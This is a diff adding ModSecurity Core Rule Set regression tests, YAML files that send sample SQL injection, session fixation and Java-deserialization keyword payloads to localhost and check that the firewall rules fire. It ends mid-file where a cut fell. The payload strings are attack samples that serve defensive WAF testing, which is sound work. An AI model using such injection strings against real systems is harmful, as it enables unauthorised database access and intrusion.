dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=OPENROWSET" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml new file mode 100644 index 000000000..fcc26c6ce --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -0,0 +1,39 @@ +--- +meta: + author: "Jose Nazario" + description: None + enabled: true + name: 942480.yaml +tests: + - test_title: 942480-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + method: GET + port: 80 + # variable name boundary attacks + uri: "/?'msdasql'" + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_title: 942480-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + # variable name boundary attacks + Cookie: "'msdasql'" + method: POST + port: 80 + version: HTTP/1.0 + output: + log_contains: "id \"942480" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml new file mode 100644 index 000000000..4d04d75d8 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml @@ -0,0 +1,336 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942490.yaml +tests: + - test_title: 942490-1 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + data: "var=%22%60%20%2A%20123" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-2 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "' ', 10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-3 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "'', '', '', '', '', '', '', '', 13" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-4 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "`>65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-5 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay='1001'='10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-6 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "\"2562*23" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-7 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=\":[\"00" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-8 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=`>6fbdec2" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-9 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay='][0]]), strtolower($b[$GLOBALS['" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-10 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=', 2, 1" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-11 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "`>9e7" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-12 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=\":\"65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-13 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay='\\2nq5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-14 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=` < 0) AND `" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-15 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay='0:0:6" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-16 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "\":60" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-17 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=\">%5 - type_submit_reset_5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-18 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "\":35" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-19 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay='3085'='30" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-20 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "\":\"[0,\\x22" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-21 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay='16/17" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-22 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "\";}7b6" + version: HTTP/1.0 + output: + log_contains: id "942490" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml new file mode 100644 index 000000000..4b3d8099f --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml @@ -0,0 +1,21 @@ +--- +meta: + author: "Franziska Buehler" + description: None + enabled: true + name: 942500.yaml +tests: + - test_title: 942500-1 + desc: "MySQL in-line comment detection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log_contains: id "942500" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml new file mode 100644 index 000000000..13bd38459 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml @@ -0,0 +1,37 @@ +--- +meta: + author: "Franziska Buehler" + description: None + enabled: true + name: 942510.yaml +tests: + - test_title: 942510-1 + desc: "SQLi bypass detected: backticks" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: localhost + method: GET + port: 80 + uri: "/?`bla`" + version: HTTP/1.0 + output: + log_contains: id "942510" + - test_title: 942510-2 + desc: "SQLi bypass detected: backticks" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: localhost + method: GET + port: 80 + uri: "/?'bla'" + version: HTTP/1.0 + output: + no_log_contains: id "942510" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml new file mode 100644 index 000000000..0712bb944 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml @@ -0,0 +1,37 @@ +--- +meta: + author: "Walter Hop" + description: None + enabled: true + name: 942511.yaml +tests: + - test_title: 942511-1 + desc: "SQLi bypass detected: quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: localhost + method: GET + port: 80 + uri: "/?`bla`" + version: HTTP/1.0 + output: + no_log_contains: id "942511" + - test_title: 942511-2 + desc: "SQLi bypass detected: quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "ModSecurity CRS 3 Tests" + Host: localhost + method: GET + port: 80 + uri: "/?'bla'" + version: HTTP/1.0 + output: + log_contains: id "942511" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml new file mode 100644 index 000000000..dd9745e8c --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml @@ -0,0 +1,28 @@ +--- +meta: + author: csanders-git + description: None + enabled: true + name: 943100.yaml +tests: + - test_title: 943100-1 + desc: Session Fixation Attack (943100) from old modsec regressions + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) + method: GET + port: 80 + uri: /foo.php?bar=blah + version: HTTP/1.1 + output: + log_contains: id "943100" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml new file mode 100644 index 000000000..6526e943b --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml @@ -0,0 +1,81 @@ +--- +meta: + author: csanders-git + description: None + enabled: true + name: 943110.yaml +tests: + - test_title: 943110-1 + desc: Session Fixation Attack (943110) from old modsec regressions + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http://www.attackersite.com/test + User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) + method: GET + port: 80 + uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 + version: HTTP/1.1 + output: + log_contains: id "943110" + - test_title: 943110-2 + desc: "session fixation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://localhost.attackersite.com/" + method: GET + port: 80 + uri: "/?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log_contains: id "943110" + - test_title: 943110-3 + desc: "session fixation attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://attackersite.com/" + method: GET + port: 80 + uri: "/?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log_contains: id "943110" + - test_title: 943110-4 + desc: Session Fixation Attack (943110) from old modsec regressions + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Referer: http://localhost/test + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) + method: GET + port: 80 + uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 + version: HTTP/1.1 + output: + no_log_contains: id "943110" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml new file mode 100644 index 000000000..df43ef254 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: csanders-git + description: None + enabled: true + name: 943120.yaml +tests: + - test_title: 943120-1 + desc: Session Fixation Attack (943120) from old modsec regressions + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) + method: GET + port: 80 + uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666 + version: HTTP/1.1 + output: + log_contains: id "943120" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml new file mode 100644 index 000000000..da0fb0c60 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944000.yaml" + description: "Description" +tests: + - test_title: 944000-1 + desc: Using text/plain Content-Type which do not have any bodyprocessor associated + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "test=value" + output: + no_log_contains: "id \"944000\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml new file mode 100644 index 000000000..119727b58 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml @@ -0,0 +1,373 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944100.yaml" + description: "Description" +tests: + - test_title: 944100-1 + desc: Argument test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + version: HTTP/1.0 + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_title: 944100-2 + desc: Argument test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944100\"" + - test_title: 944100-3 + desc: Argument name includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944100\"" + - test_title: 944100-4 + desc: Argument name includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944100\"" + - test_title: 944100-5 + desc: Cookie test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-6 + desc: Cookie test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-7 + desc: Cookie name includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.Runtime=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-8 + desc: Cookie name includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.ProcessBuilder=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-9 + desc: Request header test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-10 + desc: Request header test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-11 + desc: XML element includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-12 + desc: XML attribute name includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-13 + desc: XML attribute value includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-14 + desc: XML element value includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_title: 944100-15 + desc: XML element includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-16 + desc: XML attribute name includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-17 + desc: XML attribute value includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-18 + desc: XML element value includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944100\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml new file mode 100644 index 000000000..6a76e8d5b --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml @@ -0,0 +1,373 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944110.yaml" + description: "Description" +tests: + - test_title: 944110-1 + desc: Argument test includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 